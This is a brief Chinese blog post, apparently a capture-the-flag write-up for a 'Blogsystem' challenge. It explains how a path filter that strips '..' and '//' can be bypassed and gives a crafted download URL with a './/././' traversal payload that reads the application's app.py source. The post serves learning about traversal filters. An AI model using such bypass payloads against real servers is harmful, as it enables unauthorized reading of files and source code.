目录穿越
Blogsystem
..被过滤,替换为空
http://79b5b31f-92e6-4a60-b249-43a8e94dbff9.node5.buuoj.cn:81/download?path=./../haipa.jpg
这里是..为空后//也被替换为空,所以前面只有一个.
所以可以利用//分割..,.//./进行读取
http://79b5b31f-92e6-4a60-b249-43a8e94dbff9.node5.buuoj.cn:81/download?path=.//././/././/././/./app/app.py成功读取源码
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Dyinglight's blog!